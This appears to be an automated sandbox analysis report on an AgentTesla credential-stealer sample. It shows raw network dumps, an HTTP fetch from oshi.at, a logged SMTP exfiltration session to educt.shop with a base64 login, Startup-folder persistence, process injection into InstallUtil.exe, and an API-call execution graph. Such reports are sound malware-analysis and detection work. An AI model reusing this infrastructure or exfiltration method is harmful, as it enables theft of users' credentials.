                                                                                                          2024-12-03 14:22:12 UTC3782INData Raw: 1d 14 b7 38 e6 77 1a 2f ec 3a 31 17 73 5e 28 60 d9 dc eb dd 4a 55 02 dc 82 fd 2f bf ef 0f bf eb ee c5 2f 26 d0 e0 30 94 2b 73 b7 bf 84 57 8d ba d8 b0 b5 fe e9 5a 05 af 86 ff 44 a3 88 98 ca 9a 96 89 e9 8e d2 f9 7e 25 bd 1d 7c df 22 54 ea 2a 17 85 c1 5b 8b aa 7f 5f 45 e1 64 91 5d 14 8b a7 cd 7d 74 63 65 85 f6 ac 31 b6 bf 8c d6 fc eb ad 99 65 ef be 76 b7 9d 91 27 f1 64 37 f3 be 60 a6 ce ff 69 31 1f 51 e6 2b f7 42 3d 44 33 5a c7 e7 da 6f 0b 86 cc d6 c4 8d 11 16 96 78 df 6c c6 b6 a5 8a 90 20 16 3c 88 39 0a 5c 0b fa 2f bc e4 24 7e f2 7b 32 67 df 64 b9 d2 71 dc 8c a5 9a c6 bc ac 60 7c 87 45 83 ca 3a 68 ac e5 95 17 79 3e 5e 8e f7 9f 53 c6 9c b2 00 fe b5 a7 2a 4b f6 9d da 24 d0 ac f0 e8 62 2d bc 6a e8 1a 19 b8 34 5f 13 da 06 a2 97 5f 96 cd 27 4d ec 55 3f 0d ec 4e
                                                                                                          Data Ascii: 8w/:1s^(`JU//&0+sWZD~%|"T*[_Ed]}tce1ev'd7`i1Q+B=D3Zoxl <9\/$~{2gdq`|E:hy>^S*K$b-j4__'MU?N
                                                                                                          2024-12-03 14:22:12 UTC4096INData Raw: e0 dc dc a2 10 8e ad dc 7b fe 3c 92 72 ed b8 fb a0 7f 48 38 ae d5 ab bc 9a aa fd 6f a3 a6 08 36 f7 58 5b 6b 8b f6 29 df 18 b8 a9 23 9e 8f 00 5a 12 63 cd 81 42 f6 5d 4f 02 de a4 7e 9d 91 26 9c f3 00 b5 52 77 05 58 70 0e b8 52 fc 3d f0 61 ca 7a bc 9d dd 59 69 dc c9 f9 56 f3 d0 a7 31 ec 76 10 8b 44 74 03 70 8e 09 a7 05 8a ba 14 62 89 a9 01 59 54 6d bb cf 7b e8 fc 39 4c 39 a1 97 fb 66 79 c3 f8 87 e5 5a 82 fc 22 29 9b 6e 9c 36 aa b0 73 0b 27 84 0b de db a3 7b 0f da 19 fb f2 8d b2 30 f5 0a 9b 4c e5 58 5a 76 72 c8 3c f9 a5 2e 02 6b c7 c5 8a d8 1c e2 9e a6 c1 ee 88 d9 d3 2a e0 43 56 ae 3f 4a 00 e4 bc d8 6c 26 39 b0 2b 57 2e bd 76 0e ec 05 53 03 e1 af 00 f2 42 95 8b 58 67 86 c1 8e fe 24 da d3 7e 17 55 32 b6 de 18 fc 16 6c 48 b0 ca 52 54 a1 d3 3e 41 39 60 4f 18 51
                                                                                                          Data Ascii: {<rH8o6X[k)#ZcB]O~&RwXpR=azYiV1vDtpbYTm{9L9fyZ")n6s'{0LXZvr<.k*CV?Jl&9+W.vSBXg$~U2lHRT>A9`OQ
                                                                                                          2024-12-03 14:22:12 UTC4096INData Raw: 79 42 7d 6b 09 d7 df 62 f4 b0 d6 a6 84 08 e0 72 79 e6 a7 44 e8 6f 30 80 88 26 25 68 ad ba de 09 4e 02 8c de 73 37 8b 6d 8e 66 6b 02 51 83 8e a9 d2 67 53 31 c0 23 55 b4 ba f5 dc 83 cf d7 d8 47 bf dd 1c 06 fd d6 21 d1 8f d9 4a 49 cc 43 51 78 f2 13 a8 6c e3 44 4b 71 6e f6 5d 7e 8d be 88 ae be 53 41 f8 3d c0 8c 48 53 a0 2d aa 8a fc 12 65 76 a7 c2 95 4d 85 fe a3 3e 44 84 5b 87 8b cb 87 03 22 79 07 cb c5 08 f7 74 8f 97 8a dc f6 de 70 ee 87 dd 7b fb 41 2f 06 31 25 b5 8b 4d 5a f4 0a dc 86 36 71 5f 91 14 ce 71 f3 ea d8 6e 32 b8 a3 f4 89 3f c8 aa 75 b7 cf 65 be fb da fb d0 db 4c 2e 31 c6 ef 59 dd d3 ac 66 74 1b 2b 7d 77 f4 77 ff 20 13 8a fe a4 33 54 88 7d b5 48 98 1c 52 e0 a9 a5 2a 90 4a 2f 28 99 03 7e 3a ef ce 09 79 ee d4 c0 ea 6c f1 ec 43 71 08 42 67 9f 60 ed 57
                                                                                                          Data Ascii: yB}kbryDo0&%hNs7mfkQgS1#UG!JICQxlDKqn]~SA=HS-evM>D["ytp{A/1%MZ6q_qn2?ueL.1Yft+}ww 3T}HR*J/(~:ylCqBg`W
                                                                                                          2024-12-03 14:22:12 UTC1081INData Raw: b3 44 43 c4 57 af b7 dd aa 68 a7 b4 62 79 fe 7f 6a d7 48 04 6b 7b bc bd b7 10 4f 83 ae 6f 28 f9 62 f2 46 ed b5 8c 62 80 ed 75 1e e5 b9 2f d4 3c da 92 fa 87 23 43 9d 9c d9 eb 91 74 b5 dd 71 29 22 a1 a0 88 0e 60 ed ed 46 fc 9d bb c0 0b ba 54 c4 52 88 d0 91 4f 03 e1 e4 14 f5 e8 b4 f5 50 82 93 ce 63 98 c1 42 3b f8 64 53 aa 79 ee 99 0c 74 2d 2d ba 45 ff fa 54 0a 5f 2d e1 d1 f1 ad 21 de 95 58 e2 bc 3e 61 0b c5 a1 67 17 61 98 55 28 a8 dd 9e 80 ea 1b f4 d7 c6 63 75 a4 c3 1b 83 1d 4d 40 67 61 ad 26 8c 66 86 ac aa 45 5d 2d d0 70 2d f6 2c 69 9a 60 06 c9 ad 40 10 5c 5d 0c 53 99 dc 3c f4 41 cf 39 1e 7d 98 e3 f3 3d 76 26 72 74 4c 33 34 12 d9 2c 16 98 e8 bf 7f 91 98 08 96 99 90 22 f2 85 01 1f f6 94 5e a4 e3 3a 4e 18 0c 3a 7f 15 1c 76 23 ee 4a df 8f 0f 81 91 9c ae ed 93
                                                                                                          Data Ascii: DCWhbyjHk{Oo(bFbu/<#Ctq)"`FTROPcB;dSyt--ET_-!X>agaU(cuM@ga&fE]-p-,i`@\]S<A9}=v&rtL34,"^:N:v#J
                                                                                                          2024-12-03 14:22:22 UTC4096INData Raw: 49 e0 ba 46 ad 88 c3 7c 2e 69 c9 d6 94 1b 0d d2 d4 24 e0 3b 09 6e 78 86 ad 21 bd 77 ea 6f 46 56 9c 51 7b c8 78 5f 55 8f 8c a0 ca cc 3d ef 7f d1 bf 49 e5 23 24 fc fb b9 b9 41 a6 1f 4d af c5 04 88 65 28 f6 06 f9 ad ba 99 12 7c 64 d1 4d cc c9 ec 89 41 2f a7 ba ac a4 b0 0b 93 65 dc 3e fd ea a6 b9 c0 55 e3 e1 4c b6 e4 57 48 7a 5d e3 54 a4 1a 4f 7e eb e0 5f ec 8e 28 62 6e b4 f6 f8 32 71 85 55 a7 6e 1f b9 05 9c 72 58 10 43 cd f2 07 e2 24 d3 b6 fe 69 97 52 04 96 ca 85 29 81 00 fb 71 d1 b7 d7 f2 c3 dc a0 67 04 9c 50 94 10 10 be ee 0a f2 d3 15 7b 91 e6 f6 80 d0 f4 d6 14 4f cf 26 9a 10 9a 92 ea 95 17 03 88 fd ec 4e 48 30 a4 c7 2a 7e b8 c3 16 df ca 57 12 75 69 85 fb 72 f4 f9 8f 0c b1 7a 20 3e 87 67 e1 3c ea 38 33 59 70 54 61 c4 5a 5e 90 48 98 64 0a 81 0f 5a 83 3c 69
                                                                                                          Data Ascii: IF|.i$;nx!woFVQ{x_U=I#$AMe(|dMA/e>ULWHz]TO~_(bn2qUnrXC$iR)qgP{O&NH0*~Wuirz >g<83YpTaZ^HdZ<i
                                                                                                          2024-12-03 14:22:22 UTC4096INData Raw: 7e dc f7 2a 0e de 1c 88 1f 4b 4a a1 31 ed 23 00 39 4f 0b 26 d2 7e c4 15 a2 38 5e 85 e5 88 62 b1 8a 58 63 72 4b d6 d1 4f 36 59 90 bb 8f 8d 3f d5 eb d0 d2 69 7b 40 94 74 1d a9 92 bf 6c cb 0d 25 56 a9 df 49 db db 07 8b 02 92 6c 3f 59 98 98 2d c2 fe 60 b9 18 0c 2e 90 0d b9 7f 44 95 e2 dc 3a ac d7 fe b4 b2 b1 a8 bb 73 32 68 b1 8e 34 65 3c 7a 94 1b 13 e9 e2 c4 10 bb 37 47 ff c5 b1 57 4e 7c d8 85 33 63 ad 3f 03 68 c7 e6 7d e0 38 53 e7 12 82 5d 6a be cc 32 56 fe 7e 39 b0 2f bc 07 1b eb 65 21 14 14 5b ef c8 bd b2 8f ea e3 d9 f6 c3 fe b2 bc a7 a5 6b ee 34 1f 7c 14 96 21 6e 5b 73 d7 e3 ed ae bc 71 78 bd 9c ed 9c 0b ed 25 1f 12 02 ca 36 e6 3a 2e 10 dc 22 ab 03 42 43 c2 f3 32 43 8d 55 34 a6 e9 95 7a 8a 20 c8 aa 0d f4 76 c5 6f 7f 87 3e a4 31 da e9 5e ab 0c d0 55 f1 dd
                                                                                                          Data Ascii: ~*KJ1#9O&~8^bXcrKO6Y?i{@tl%VIl?Y-`.D:s2h4e<z7GWN|3c?h}8S]j2V~9/e![k4|!n[sqx%6:."BC2CU4z vo>1^U
                                                                                                          2024-12-03 14:22:23 UTC4096INData Raw: 6e a0 41 25 5f dd e9 9e ab 21 0c 5a f1 74 21 64 bd 56 ba cd 3e ac d3 8a 98 7b a7 34 bc ff 64 14 27 e5 99 54 b9 b0 06 0d 3a f6 74 e6 4f 72 64 fe 65 62 9f 05 cf cc 2e 4b bb 37 b1 0e 5f 5f 86 35 01 eb 1f a5 9b 53 84 a6 2b 61 e6 f8 85 30 80 7b 9e 44 24 f4 ae 72 81 41 50 8b 64 fb be 02 d1 a9 66 1d 26 61 77 00 41 8a 4f 11 61 87 68 03 cd 50 4c 9c ef 96 2f c0 b1 80 29 d6 7e db 73 c8 0a 1e 43 42 de 2c 94 ae 3e f5 9f b0 91 2a ac c1 4b 42 c6 f3 ab e6 78 a3 f5 b4 27 ff 54 63 84 36 44 a9 50 07 81 2b c0 fe 46 a4 17 93 a9 a6 99 f3 3f 49 fd 09 e6 d8 ac cb 6c e4 e8 5a a9 6e 6d 26 20 54 d1 2f 5c f0 b9 2b ab e0 cf 0f 9f d0 99 01 49 40 f4 88 37 db e9 9c fd e7 ab 4d 0a 94 0a 8d 77 83 bd 2e 93 ef 6e 4d 79 ea 11 43 42 d3 c0 b4 a4 f0 98 3f 24 ea 14 19 0d 5d 89 bf a5 6b ec aa ff
                                                                                                          Data Ascii: nA%_!Zt!dV>{4d'T:tOrdeb.K7__5S+a0{D$rAPdf&awAOahPL/)~sCB,>*KBx'Tc6DP+F?IlZnm& T/\+I@7Mw.nMyCB?$]k
                                                                                                          2024-12-03 14:22:23 UTC4096INData Raw: be bd 60 cd 9b 31 f9 1f 5b 8a ab 68 0d 85 90 bf 92 08 94 1b 9b ab 6b d1 2f bd 2c 62 51 e0 db bc 78 45 06 20 e4 63 4a b0 b5 81 d9 01 38 78 e5 8a e5 1d a2 f9 b0 12 5d da 88 67 98 37 63 71 5e a6 7c df 04 cb 91 c8 10 cc 69 96 9f 5a 5b 2b db 27 02 c9 fb d5 f9 6b 4d eb 00 1e a9 c8 e3 21 8c f7 be 27 92 30 f0 09 16 7f 5c 76 13 c7 a1 89 7c 4c 97 b0 5e 35 7a 97 df 7a 73 ba 53 86 66 64 20 ba 14 d0 f7 e6 42 ef 22 4e b0 42 cf a8 a6 8d 16 b8 1c 55 75 93 d0 94 bd fb 58 60 6f 61 71 c1 6f 23 03 12 6e 34 cc 83 d2 ae 94 05 6a 82 b4 88 4e ae b5 a6 97 cf f1 38 81 fe 65 87 3e 0a 85 42 2f c9 f3 da 49 8d 3f 76 a4 ef 0e 97 a1 a3 c3 14 6d f4 71 69 18 74 5a a8 0d a4 17 4f 5e 51 75 43 90 e9 57 75 8a 10 5f 5d 90 9f 03 22 16 0a a8 e5 84 cd e1 ee f2 ca fc 04 93 9b cf fe 3d 83 5c 03 02
                                                                                                          Data Ascii: `1[hk/,bQxE cJ8x]g7cq^|iZ[+'kM!'0\v|L^5zzsSfd B"NBUuX`oaqo#n4jN8e>B/I?vmqitZO^QuCWu_]"=\
                                                                                                          2024-12-03 14:22:23 UTC4096INData Raw: a4 e4 60 2d 14 c4 82 99 72 15 3c 72 a8 09 03 c8 2b 45 94 4a 98 f6 ec 50 55 a4 52 27 e3 53 8e ee 12 87 60 d7 b9 f8 f7 0c 34 e5 af 5a 66 63 b5 44 b4 f0 61 15 9d 02 81 7c 15 45 bf 41 63 1f 17 a2 05 ad f7 fb 74 bb e1 ef f4 2f c7 de 08 73 38 ab 55 5e ba c5 ec e4 15 9b 06 9c 6b bc 36 c2 c4 92 ca 7a e8 04 e0 4a a1 fb f4 5f 53 ae ce 5e 47 66 ad 53 c8 3a 49 9f 91 10 9a 24 19 87 71 97 ce f9 24 c4 d4 4e 2e 29 9a 24 61 ed e6 d6 b3 14 5c 91 cd 07 da 42 84 aa 01 53 79 a6 82 f6 0d ec f5 67 53 5a d7 fe a2 c8 e7 31 7d 63 6b 9e 79 7b b4 71 9d 8f fd a1 7b 75 0e 44 f6 63 86 49 dc 31 63 50 56 ec 2c b3 04 4e d1 d4 dc 01 fe ac 3f 8c 87 da cd 7c 4d 7d 55 94 11 ca 89 96 8b 0a 19 d0 c2 b3 e0 76 8d c5 87 ce 14 53 76 60 c1 17 90 3e 8d 91 26 08 f3 85 e6 53 29 c8 64 c2 33 dd 8e c5 cf
                                                                                                          Data Ascii: `-r<r+EJPUR'S`4ZfcDa|EAct/s8U^k6zJ_S^GfS:I$q$N.)$a\BSygSZ1}cky{q{uDcI1cPV,N?|M}UvSv`>&S)d3
                                                                                                          2024-12-03 14:22:23 UTC4096INData Raw: 65 4a 98 58 da 51 8a c9 80 a3 91 76 bf 27 26 26 b4 90 82 0d 0b 18 62 10 75 0c 72 e4 02 9d 57 f4 d0 9d a6 80 8c 83 7d 45 5d d6 65 0c b6 2e 13 e2 45 00 d2 93 eb 1b 8a 25 4a 50 68 31 65 b3 a6 91 91 89 3b 48 35 2b 25 91 b4 e1 ec 45 31 3d ea 9e 72 c0 dc 9f bf e9 3f 2a fa c9 86 b5 27 ce 0e 3f 43 51 33 83 c0 8b 01 e4 82 ea fc 10 98 8d 16 ea ec 62 6c 41 0f 34 20 47 30 32 b4 32 76 bc b5 58 c3 c0 e3 d4 95 c6 13 93 9c 48 26 d2 ed 18 16 c8 8a c7 f4 39 99 3d cb 38 b7 30 12 a6 03 b1 b4 c7 8a 21 ce c4 90 40 90 0d 49 e2 83 7d 20 dc 15 fb 04 69 b9 4b dc ad 11 f3 82 ed 9f 07 bf 09 8a 6b 35 8c b5 bd 19 fa 88 93 3c a5 ed b7 52 12 e7 b6 d4 8d 27 e3 ef 3a e7 59 65 6f fe 68 af 47 22 da ac c4 08 dc 4a f8 24 1e 29 6f 89 6e 8f 73 e8 d3 5a 91 4a dc 0a bd 65 6c 02 c6 2b 36 1f 26 88
                                                                                                          Data Ascii: eJXQv'&&burW}E]e.E%JPh1e;H5+%E1=r?*'?CQ3blA4 G022vXH&9=80!@I} iKk5<R':YeohG"J$)onsZJel+6&


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.6499735.253.86.154435504C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-03 14:22:43 UTC37OUTGET /Dwhm HTTP/1.1
                                                                                                          Host: oshi.at


                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                          Dec 3, 2024 15:21:08.510656118 CET58749759162.254.34.31192.168.2.6220 server1.educt.shop ESMTP Postfix
                                                                                                          Dec 3, 2024 15:21:08.510930061 CET49759587192.168.2.6162.254.34.31EHLO 445817
                                                                                                          Dec 3, 2024 15:21:08.895291090 CET58749759162.254.34.31192.168.2.6250-server1.educt.shop
                                                                                                          250-PIPELINING
                                                                                                          250-SIZE 204800000
                                                                                                          250-ETRN
                                                                                                          250-STARTTLS
                                                                                                          250-AUTH PLAIN LOGIN
                                                                                                          250-AUTH=PLAIN LOGIN
                                                                                                          250-ENHANCEDSTATUSCODES
                                                                                                          250-8BITMIME
                                                                                                          250-DSN
                                                                                                          250 CHUNKING
                                                                                                          Dec 3, 2024 15:21:08.903079987 CET49759587192.168.2.6162.254.34.31AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
                                                                                                          Dec 3, 2024 15:21:09.289201021 CET58749759162.254.34.31192.168.2.6334 UGFzc3dvcmQ6
                                                                                                          Dec 3, 2024 15:21:09.691726923 CET58749759162.254.34.31192.168.2.6235 2.7.0 Authentication successful
                                                                                                          Dec 3, 2024 15:21:09.692024946 CET49759587192.168.2.6162.254.34.31MAIL FROM:<sendxambro@educt.shop>
                                                                                                          Dec 3, 2024 15:21:10.075598955 CET58749759162.254.34.31192.168.2.6250 2.1.0 Ok
                                                                                                          Dec 3, 2024 15:21:10.076457977 CET49759587192.168.2.6162.254.34.31RCPT TO:<ambro@educt.shop>
                                                                                                          Dec 3, 2024 15:21:10.530888081 CET58749759162.254.34.31192.168.2.6250 2.1.5 Ok
                                                                                                          Dec 3, 2024 15:21:10.531013966 CET49759587192.168.2.6162.254.34.31DATA
                                                                                                          Dec 3, 2024 15:21:10.911946058 CET58749759162.254.34.31192.168.2.6354 End data with <CR><LF>.<CR><LF>
                                                                                                          Dec 3, 2024 15:21:10.960105896 CET49759587192.168.2.6162.254.34.31.
                                                                                                          Dec 3, 2024 15:21:11.459167004 CET58749759162.254.34.31192.168.2.6250 2.0.0 Ok: queued as 416CE89B21

                                                                                                          Click to jump to process

                                                                                                          Click to jump to process

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Click to jump to process

                                                                                                          Target ID:0
                                                                                                          Start time:09:20:39
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Users\user\Desktop\Ref#60031796.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\Ref#60031796.exe"
                                                                                                          Imagebase:0x840000
                                                                                                          File size:221'664 bytes
                                                                                                          MD5 hash:654AD72D10AED979428B6B130700754A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2367043467.0000000007080000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2357319019.0000000003E9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2347570758.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2357319019.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2357319019.0000000003C68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:09:21:02
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                          Imagebase:0x4e0000
                                                                                                          File size:42'064 bytes
                                                                                                          MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3358965751.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.3361572023.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:moderate
                                                                                                          Has exited:false

                                                                                                          Target ID:4
                                                                                                          Start time:09:21:13
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs"
                                                                                                          Imagebase:0x7ff73b1c0000
                                                                                                          File size:170'496 bytes
                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Target ID:5
                                                                                                          Start time:09:21:13
                                                                                                          Start date:03/12/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\vdvfyt.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\vdvfyt.exe"
                                                                                                          Imagebase:0xca0000
                                                                                                          File size:221'664 bytes
                                                                                                          MD5 hash:654AD72D10AED979428B6B130700754A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          • Detection: 13%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:10.6%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:3%
                                                                                                            Total number of Nodes:301
                                                                                                            Total number of Limit Nodes:15
                                                                                                            execution_graph 80985 714e990 80986 714e9a5 80985->80986 80987 714e9bb 80986->80987 80989 68204b6 80986->80989 80990 68204c5 80989->80990 80994 6824934 80990->80994 80998 6824940 80990->80998 80991 68200b7 80991->80987 80995 6824940 CopyFileA 80994->80995 80997 6824a97 80995->80997 80999 6824995 CopyFileA 80998->80999 81001 6824a97 80999->81001 81025 6f41cb0 81026 6f41cca 81025->81026 81027 6f41cda 81026->81027 81032 6f43772 81026->81032 81037 6f499a8 81026->81037 81041 6f45409 81026->81041 81046 6f45fc0 81026->81046 81033 6f43791 81032->81033 81050 6f705c9 81033->81050 81055 6f705d8 81033->81055 81034 6f437b5 81039 6f705c9 2 API calls 81037->81039 81040 6f705d8 2 API calls 81037->81040 81038 6f424e7 81039->81038 81040->81038 81042 6f488f3 81041->81042 81068 6f71cc0 81042->81068 81073 6f71cd0 81042->81073 81043 6f48917 81048 6f705c9 2 API calls 81046->81048 81049 6f705d8 2 API calls 81046->81049 81047 6f45fde 81048->81047 81049->81047 81052 6f705ff 81050->81052 81051 6f706bc 81051->81034 81060 6f70e40 81052->81060 81064 6f70e39 81052->81064 81057 6f705ff 81055->81057 81056 6f706bc 81056->81034 81058 6f70e40 VirtualProtect 81057->81058 81059 6f70e39 VirtualProtect 81057->81059 81058->81056 81059->81056 81061 6f70e88 VirtualProtect 81060->81061 81063 6f70ec3 81061->81063 81063->81051 81065 6f70e40 VirtualProtect 81064->81065 81067 6f70ec3 81065->81067 81067->81051 81069 6f71ce5 81068->81069 81078 6f71d20 81069->81078 81083 6f71d11 81069->81083 81070 6f71cfd 81070->81043 81074 6f71ce5 81073->81074 81076 6f71d11 2 API calls 81074->81076 81077 6f71d20 2 API calls 81074->81077 81075 6f71cfd 81075->81043 81076->81075 81077->81075 81080 6f71d47 81078->81080 81079 6f71e03 81079->81070 81088 6f71e21 81080->81088 81092 6f71e28 81080->81092 81085 6f71d1a 81083->81085 81084 6f71e03 81084->81070 81086 6f71e21 VirtualAlloc 81085->81086 81087 6f71e28 VirtualAlloc 81085->81087 81086->81084 81087->81084 81089 6f71e68 VirtualAlloc 81088->81089 81091 6f71ea2 81089->81091 81091->81079 81093 6f71e68 VirtualAlloc 81092->81093 81095 6f71ea2 81093->81095 81095->81079 81096 125e9e0 81097 125ea26 GetCurrentProcess 81096->81097 81099 125ea71 81097->81099 81100 125ea78 GetCurrentThread 81097->81100 81099->81100 81101 125eab5 GetCurrentProcess 81100->81101 81103 125eaae 81100->81103 81102 125eaeb GetCurrentThreadId 81101->81102 81105 125eb44 81102->81105 81103->81101 81106 682dde8 81107 682de36 NtProtectVirtualMemory 81106->81107 81109 682de80 81107->81109 81110 125e8c8 81111 125e8d5 81110->81111 81113 125e90f 81111->81113 81114 125d460 81111->81114 81115 125d46b 81114->81115 81116 125f628 81115->81116 81118 125ec64 81115->81118 81119 125ec6f 81118->81119 81123 50f1598 81119->81123 81128 50f1580 81119->81128 81120 125f6d1 81120->81116 81124 50f15d5 81123->81124 81125 50f15c9 81123->81125 81124->81120 81125->81124 81133 50f22c8 81125->81133 81137 50f22b8 81125->81137 81129 50f15d5 81128->81129 81130 50f15c9 81128->81130 81129->81120 81130->81129 81131 50f22b8 CreateWindowExW 81130->81131 81132 50f22c8 CreateWindowExW 81130->81132 81131->81129 81132->81129 81134 50f22f3 81133->81134 81135 50f23a2 81134->81135 81141 50f3090 81134->81141 81138 50f22f3 81137->81138 81139 50f23a2 81138->81139 81140 50f3090 CreateWindowExW 81138->81140 81140->81139 81143 50f3092 81141->81143 81142 50f31d0 81142->81135 81143->81142 81144 50f32b3 CreateWindowExW 81143->81144 81145 50f3314 81144->81145 81008 7149aa0 81009 7149ab5 81008->81009 81012 7149c2c 81009->81012 81013 7149c4b 81012->81013 81014 7149acb 81013->81014 81017 714a870 81013->81017 81021 714a869 81013->81021 81018 714a8b8 VirtualProtect 81017->81018 81020 714a8f3 81018->81020 81020->81013 81022 714a870 VirtualProtect 81021->81022 81024 714a8f3 81022->81024 81024->81013 81002 125f030 DuplicateHandle 81003 125f0c6 81002->81003 81146 714abe1 81147 714abc0 81146->81147 81149 714abea 81146->81149 81151 714ae5b 81147->81151 81152 714adac 81151->81152 81152->81151 81153 714abdb 81152->81153 81154 714a870 VirtualProtect 81152->81154 81155 714a869 VirtualProtect 81152->81155 81154->81152 81155->81152 81156 50f58f9 81157 50f5924 81156->81157 81158 50f5a2c 81157->81158 81159 50f5982 81157->81159 81163 50f0f1c 81158->81163 81160 50f59da CallWindowProcW 81159->81160 81162 50f5989 81159->81162 81160->81162 81164 50f0f27 81163->81164 81166 50f4159 81164->81166 81167 50f1044 CallWindowProcW 81164->81167 81167->81166 81168 e6d01c 81169 e6d034 81168->81169 81170 e6d08e 81169->81170 81171 50f0f1c CallWindowProcW 81169->81171 81175 50f4100 81169->81175 81179 50f3398 81169->81179 81183 50f33a8 81169->81183 81171->81170 81177 50f4135 81175->81177 81178 50f4159 81177->81178 81187 50f1044 CallWindowProcW 81177->81187 81180 50f33ce 81179->81180 81181 50f0f1c CallWindowProcW 81180->81181 81182 50f33ef 81181->81182 81182->81170 81184 50f33ce 81183->81184 81185 50f0f1c CallWindowProcW 81184->81185 81186 50f33ef 81185->81186 81186->81170 81187->81178 81188 6825578 81189 682558d 81188->81189 81193 6825967 81189->81193 81198 6825b5d 81189->81198 81190 68255a3 81195 6825615 81193->81195 81194 6825672 81194->81190 81195->81194 81203 6826af0 81195->81203 81207 6826ae0 81195->81207 81200 6825615 81198->81200 81199 6825672 81199->81190 81200->81199 81201 6826ae0 10 API calls 81200->81201 81202 6826af0 10 API calls 81200->81202 81201->81200 81202->81200 81204 6826b05 81203->81204 81212 6826f67 81204->81212 81208 6826aee 81207->81208 81210 6826b57 81207->81210 81211 6826f67 10 API calls 81208->81211 81209 6826b27 81209->81195 81211->81209 81213 682706f 81212->81213 81217 68273f8 81213->81217 81231 6827408 81213->81231 81214 6826bab 81218 6827402 81217->81218 81220 68273cf 81217->81220 81244 68276b0 81218->81244 81249 682824d 81218->81249 81254 6827fa9 81218->81254 81259 6827c7f 81218->81259 81264 68287c8 81218->81264 81269 6827868 81218->81269 81274 682760a 81218->81274 81279 6827b6b 81218->81279 81284 6827d71 81218->81284 81289 6827a24 81218->81289 81219 682743f 81219->81214 81220->81214 81232 682741d 81231->81232 81234 68276b0 2 API calls 81232->81234 81235 6827d71 2 API calls 81232->81235 81236 6827a24 2 API calls 81232->81236 